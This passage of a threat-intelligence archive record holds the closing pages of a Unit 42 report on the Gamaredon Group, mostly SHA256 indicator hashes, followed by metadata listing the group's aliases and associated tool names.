32c6a09f6c7bdff9dbe27faceef53604145ea\r\n2c02d3d3fadd76f9d21f5c093459ddc0045c94f17679269eb7a2990a1a88cb42\r\n2d55000bb5cb9e3e1f137810c2e1eb899f68c40e4a6f6307f226c7b8af208abd\r\n2ded2f3b5b5b6155ce818893c67887cbfa8b539be6c983e314ccf2177552da20\r\n2e89436b355550ceb361fac1b03b78b71eda11d25f26223ac5c8c34ed8972a05\r\n32b0e6394b110860371da5541946a6dcc85358a3951eddc86fdaf5794527c150\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 14 of 17\n\n33934fcfae5760316b3f40e013cbb03d8086f8c30f9a4ba9bed3f9486a530796\r\n34d86602882e86f8aaaeb7513126c8579a4489f2be31c279188e2f2ca8a0e141\r\n390162dae62a0347e35cf5dad093cfc2f7d4ded62fba9d2df7af6133feb41ee0\r\n3ef8602579c6b145fbaafc8970b4c9a6e7bebd11eb5e37eecaa67b4572c6038b\r\n420acd7e8598fe994b59bf5d30f89e1c11b36cbef464a4786694cf9eada8dd4c\r\n42b4c39179f76ea9eb5835b55a3cf4d8dbb29d42ee0622ad2e89ca48d01e8988\r\n42eed03907c9dfa0e566fbe5968cdb5a1b7b5e18521f7327185ed2208c6c29b4\r\n46a39da996b01e26ddd71d51c9704de2aa641cd3443f6fe0e5c485f1cd9fa65d\r\n47d929c69bfd8d8efb9c280eabec2f73d4bddf1c3c30120c3fb6334623469888\r\n505ef8cbc1271ce32f0c473468d75a1aba5073c37b2e6b49293ddc9efcb4ac96\r\n5230453eeb98c5a183129ed8b918b429e96020887302ba30941c408108a1ab84\r\n5363220b532d7da378b338e839a501ae5c006cc03c8b2d3627c480d64deb1221\r\n558f33d478091993e5b5921604f8c3873efc87f551fddf61612b5c64d5b610f6\r\n55c76f4f93f9e155fbb6a28447f97c1ccda0081061dc3cb9973d42c1686964b7\r\n56c8246819f7de5cba91001793831441d4ce998ccb8237cb96c9f52e88ea384b\r\n59bddb5ccdc1c37c838c8a3d96a865a28c75b5807415fd931eaff0af931d1820\r\n5ac627f8964d3b9cad69f21e3b8f27305f1f68f49e4f4fae2c73949a04b32692\r\n5ccc76ae1cdf668ba7f89c6cbd0bad44f148cbee736320ead237262ba170ffba\r\n5cd4401c1dae9b9ecd75c96ab29dc64ce40bef3acc6faf7c001ff98ebd3b3413\r\n5cd72eaf555813f1ee187def594584f5cfc6a5e83086f35e281327b5210adffb\r\n5f8293eda9fb40684caddf576eba6c81f3a06911ca9e4ecf84ede3b2891cff5e\r\n6c258151c593268c13c252d8f275192a6f7a74d5de5754f2cf20fb94be7ee6ea\r\n0458
e168baa4fa5942892065925ac82b12245551b539d54c2884b3a21c2699d8\r\n877f1de209eb9d8b2a20a76f8773d12e5a1fcde4148868c7b73added392f62f6\r\n29c728a169c5d18298e77db161dd5d2f6396ceca9ee7849b63ff8a8bc11f911e\r\n98e092b7bfc3bbdaeb82e05de14ba5835c6ac626c17de9eef2049796a031dd10\r\n27e08fb90ada2fd8ce6b6149786edd3b814dd0324257ebd919ed66ada0334b21\r\n9f651ae6ea538238748614a7f86fe2b0f76e881d6c38da581f284e4b6f79b0ca\r\nf47115ea58615781e56dcac673c19edf7ce00defd7ada709ae97b0708d3eac1e\r\nb80719854f8744ba62e9f0e774c09e2e2ed79dd37f9f94ba3ed05ec8507d55e6\r\n467f04914a1e6093bdaf5c28884bf95ec738234033b3292d289a0799de196d49\r\n5c47d18b3f0e0274c6a66b2eab27d47c73a0105c263d41c6473aba9a28d0a4ba\r\n01c5729ac1ae3928053c085fd616323a3715863ab3d7e9b8106c09e24df34183\r\n5b6a691cf8faf238b27861941a1b667d889889cc9711a3e561403d6a6ed292c9\r\ne2688f72cc7ae836be19e765e39318873554ee194a09945eb3f3805d04f256ca\r\n9f0228e3d1577ffb2533584c2b1d87ebee0c0d490f981e61d18bb27ab02e52cb\r\n2617f9301869304b88d8a3a4f7b2eab6b0edf264cc1a28b99f5685959242ec39\r\nf3107a5a00f36e12be7cc2e37c35903ef855b8043492af374ea918385821443c\r\n63fcfab8e9b97d9aec3d6f243003ea3e2bf955523f08e6f1c0d1e28c839ee3d5\r\n05cbe01b1125897e0e982c587a10a72f4df795b844a4a2c4cec44aee7f30ce94\r\n5a7da102c11960b9651650143a4a08ae4ce97d68dff999961f1ffc792531afeb\r\ndf6112e6bad4125b80b8829c13a2ca523bb82cf303cf531389d8795e7512c7e6\r\ncfb8216be1a50aa3d425072942ff70f92102d4f4b155ab2cf1e7059244b99d31\r\ne79dbcc8b60da280e53d9cf818eee1de34251e0551b9947bb2b79a31b131417e\r\na73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6\r\n3ef3a06605b462ea31b821eb76b1ea0fdf664e17d010c1d5e57284632f339d4b\r\nf2355a66af99db5f856ebfcfeb2b9e67e5e83fff9b04cdc09ac0fabb4af556bd\r\nca87eb1a21c6d4ffd782b225b178ba65463f73de6f4c736eb135be5864f556dc\r\n550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6\r\nf77d7940c51c2a1eab849dbd77e59c683ebf7820799ef349e7da2583e1aa11ae\r\n2c5d55619d2f56dc5824a4845334e7804d6d306daac1c23bec6f078f30f1c825\r\n7231177a115656041ba4e5b3cf0bf7a5
47b074f03592351484267e25cda7c899\r\nd5405f99cec0166857274b6c02a7ef52b36274fedb805a17d2089fd24ed133cf\r\n81921b6a7eba39a3f73895a57892ed3a46ab6365ac97d550ca3b9bff46c7a1c2\r\n1eef9f8d7d3099b87be7ac25121f9d2ccacfb5ccf02b508fb2036b6e059c525f\r\n5255061c3600df1a94b376fca40f3ccb69d1cb6dd42aa744b20a643c7292d20c\r\nb5199a302f053e5e9cb7e82cc1e502b5edbf04699c2839acb514592f2eeabb13\r\n5fb7f6f953be3b65d88bd86d1391ebc9f88fc10b0ef23541463ebf5b157f695c\r\n6016cf9898d74e2e9030be7c987964d817ba28ad2253d1da54c81a1bf49db836\r\n621e55421dffae981e3e933c65626314d5610c7c08f76f83a3d07f0ec6c36e2d\r\n6ccc24971073d24d90c4cbaf83dfbae2969cbf527e319c7ee9a4babcbe88e456\r\n6f8da9180eebe02ba35317cb8aee5c8df6ac29795af70eb9430c3588d457aad6\r\n71c5b899a5187baeb8f605ca39ca56bf05a63025a8f9f84c45590d8345e5d349\r\n725b7d92ed66be160f2e04395008a65c72814d5ddf842d9778396f6c6679d85e\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 15 of 17\n\n72d4b780a90ede7ea152f5da0973965cab31d2813fa8c2fe0e1cb611f5ca257e\r\n73670d06851f588c7df44dc478f49883406697c48c618438e0f249b7a916552e\r\n74e017853fbc85ee77ca7476cd25423815602aaaa02b29e0003c95c9551b8890\r\n75d2367dc79d9f8aed165729df90ed5d28fefe267778dbe4d3d74aafa75d66e0\r\n7a5a1c6ea0c2f017df9f06975c93a356cac20b19031fcde96136fa5881e5ef3a\r\n7adb049e0b49312aea904c70e16d0e7f03d01aae4bf8ac867e8219ced4e6e057\r\n7bfa85bec239b6c4419b2d57149c5960263c80e493f888d03ceaaa3f945b1b25\r\n7f324b658f587b3b27921ebeba5ac25aebd669b33e6801fa9581de8c2eb0df2e\r\n7fee970748eb83045e36911dafdaee0d4069ebe72c059cc7de3d65539012c2e9\r\n823793a37d748ffe708864c16c853c67a5db812712481da1d24790b455163940\r\n8512aabfa0175684bdbb77481d6b272b63dbc4249b04a44e1003b7d8fdea0a89\r\n86c81f03cf7d8f8af38c2559dbf506cccdc25579f3b29fb574f823a67f99a0a3\r\n88ae7e60b9dd57fc6b2d667ce33fb29c0f75d37eb7c837ccf56cb7994386d5ef\r\n8b50e3ca06a22d0be6a71232b320137c776f80ac3f2c81b7440b43854b8a3bf0\r\n8bd40e7fe6bbd4d5810db2c142186bb58da445a132fb6f9ff01c46947a532244\r\n8c9d690e7
65c7656152ad980edd2200b81d2afceef882ed81287fe212249f845\r\n8d38726d674279705fe06b4b45bbbaef10756c547d560cea6998e23dba09f80c\r\n8db47439685edc683765abb5e6d7d0d05479bf9ee164992db9e8ce97fe43ee2f\r\n95de2e16f1b05d1b45b1d182c1503568c2e5fd4a81ac52fe1bc9e881d1a272b1\r\n95e3204228341852b7c97f357f799e7ec9688abe1262436b569e56397f1fd864\r\n98caf00760d772598386eb8d4f26caf92fb891915ac08da6bf830be5e45278d3\r\n99c9440a84cdc428ce140de901452eb334faec49f1f6258acdde1ddcbb34376e\r\n9a8776e4ae38cf529bab28947b31ade84301262b7996dc37ec47afa4fb4cf6e1\r\n9beb1d2a03ff2d4c15913de0f87b72074155b44df791bd967dac8155e97a0e06\r\n9c8d518fbbc8cbb25fa309f5396efa5749e57a3b0158779404c8d3e92baf6596\r\na064a28e5e7409a96bba93fc57f44cadc3492bb0f49792c89c973e30b0f5d498\r\na194b47043356fa365d98a5f7c582b6f87fac90acf0f469ed3651cfe2fd7b2c9\r\na21dfb8e8b7c8dfbeeb4d72e6ef1f22c667b8968b3a3b1dcce99f44faab05903\r\na2e0fe2d385dabcdfb024100216d259ddd1fa9907e982d297846fd29b8d4d415\r\na48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599\r\na595da9a2fa58d4f8be0bfbcf7f4c950435ff5289dd1ccf2c65eec73a0afe97f\r\na972ad0ddc00d5c04d9fe26f1748e12008efdd6524c9d2ea4e6c2d3e42d82b7b\r\naa860d405746401ae4155485326fdeb39718832c77c73540d48f4fbb8e596215\r\nab6832a4432b4bdaec0706f7b00a369c48175eac9abc3e537032b1f5d26a993b\r\nada2f0703614b3447d427827777af5d4ee9ffe9179498970326926751a4f8d65\r\nb16d317c11228bd3573126a0e1bc0bbf35d84a4a1f47dfb06b70634a21fd9823\r\nb3665548cc0f2fce3593fb7139f49588faa1d327b6d23feb564ca4194053ae8a\r\nb5578c48a11533871ae91e6d5632aafc25d3976c0626d62abab306663566d024\r\nb67a6f87fc3fd7c5c3666acac5918c8c08a53ab6a966f4d1daf38105a566ede1\r\nb6abc8ab631dcf52e028ab26dbe3bb94022d69193c0acc8642cbd6329cbb23ef\r\nb7e117eb342b0d450095805073326989c792bf5ccbbdcd5f4a9ace50e517412e\r\nbb14abc9b0798c7756a6ed887308a3e6210cc08a5149dc1360fdd1f5bca27cca\r\nbdadb319f071f02462d107380102b669e407bb2a0b20e77a9a8a5726b4cbbc4b\r\nbf2383cfbee4cbb0bda2614839454ab1724c9bbfff8b4b48e0f48579ae220c10\r\nbf52b44168de1855d83186163a2d5f29e488d
dafdfd5447e211aec4a769cf74a\r\nc0d5cf7a0035deda5646aaf520b3ff632aa6be76ddbc88f38ddc11e77ffb40b4\r\nc1a82a788df7418712664138c0fdb05232036a27ab0998479d60c656998849f1\r\nc63a523834ab59ab5621a0acb156a9b901befe806044642fe5fec8a0ba545e70\r\nd05d3f3582e13eaf5f39d7143ca1a4b1367cc5267bf9958a15e27cf53e059518\r\nd0e456cff03c2483ded9a0f8c1b99f9fefb6ba47dcaf949dae27abe940ee20e6\r\nd8a01f69840c07ace6ae33e2f76e832c22d4513c07e252b6730b6de51c2e4385\r\ndada74663e3e29ee26bfd03a888f0bda9fc81e148511fa98f73f8e8a915933cc\r\ndb3ffcbf136e0268ec66f28b30fa8ba350f74e02e8e737e61cc6ef8d8258027e\r\ndd26b85b6568595b1d2bbc47ce47d071ede75665fbd779d637b74663ead5539e\r\ndf9038660164623a827a8119d4cb3d71d0a5288b12bdfdd32c72769bf90a9ea0\r\ndfed16e9184a86e6fcd17a98f127410840d058db667e9975b43add100c33122e\r\ne0063d2524a89159cf5da12661225fbb27725bbd72acd9497b7207ecf2f3aeb6\r\ne00c55ddda9cbb82fb47924fafdf40c3394dc1127d9901c71a69ef3ef664b817\r\ne14a51d69211948163ab20b0cc68adf410bb821f2890f55d2d202c745f4ec1b8\r\ne2e3f243bbcad666852e64202d35f6dd88c58f5d24435d92975697b0efa8a775\r\ne37e25739e8bc4620d9d37d8f6b400cd82c85b89d206436ba35930ed96db6eb0\r\ne55b5ede808b6d491f18737d6a1cf34b5178f02e9ea01d7cff31a449888dbd73\r\ned28d9207acac2afff817eaa56d1599422e23946dffa4f8bade376d52a6af7d4\r\neda0853e814ee31a66c3b42af45cd66019ffd61eac30e97bd34c27d79253a1bb\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 16 of 17\n\nf1b3e58d060803b0ff6008386bab47fb8099ac75ee74f385ac34340a28bf716e\r\nf2091f71227180d74ba1ba4607635e623553b1826314dca91cb31839eb00c4ea\r\nf214d55ccb5db5edbaafe7d40b240c79f04c70d441adee01ef438f776eb37037\r\nf571ddc894915dee136cf24731ff3d79fe4f811b112d122a34a128628cb43c4a\r\nf7676d2a28992a382475af2ae0abca4794e1397ef3327f30f7d4cbdbc2ca0a68\r\nf8e20894c8c18d79e80b431008aa8bef46cc10a355a4934f9cc40ffd637b8890\r\nfa1bf7565352099b74624c8beeff6620411e1efe00e54f8b4190f69e243d5811\r\nfa784f69265ebe5e150cf5956a40d86335d1a5edc57fffcc7ce6eedc591c2751\r\nSource: 
http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution"
	],
	"report_names": [
		"unit-42-title-gamaredon-group-toolset-evolution"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8bd26575-9221-47d1-9d8b-5c18354dc1bd",
			"created_at": "2022-10-25T16:07:24.335Z",
			"updated_at": "2026-04-10T02:00:04.94173Z",
			"deleted_at": null,
			"main_name": "Tortilla",
			"aliases": [],
			"source_name": "ETDA:Tortilla",
			"tools": [
				"Babuk",
				"Babuk Locker",
				"Babyk",
				"CHINACHOPPER",
				"China Chopper",
				"SinoChopper",
				"Vasa Locker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434910,
	"ts_updated_at": 1775826695,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d870eee1c89b358082b38b2dcc4850e137ca1d83.pdf",
		"text": "https://archive.orkl.eu/d870eee1c89b358082b38b2dcc4850e137ca1d83.txt",
		"img": "https://archive.orkl.eu/d870eee1c89b358082b38b2dcc4850e137ca1d83.jpg"
	}
}